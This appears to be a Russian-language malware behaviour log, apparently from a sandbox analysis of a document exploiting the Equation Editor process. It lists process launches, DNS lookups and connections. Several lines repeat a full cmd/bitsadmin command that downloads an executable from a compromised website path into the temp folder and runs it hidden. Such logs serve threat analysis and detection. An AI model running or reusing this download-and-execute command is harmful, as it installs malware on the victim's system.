Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer ZH /priority foreground https://apsoluta.com/blog/wp-admin/includes/_output1D22F80.exe %TEMP%\N.exe && start %TEMP%\N.exe
- 'ap###uta.com':443
- 'ap###uta.com':443
- DNS ASK ap###uta.com
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer ZH /priority foreground https://apsoluta.com/blog/wp-admin/includes/_output1D22F80.exe %TEMP%\N.exe
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer ZH /priority foreground https://apsoluta.com/blog/wp-admin/includes/_output1D22F80.exe %TEMP%\N.exe && start %TEMP%\N.exe (со скрытым окном)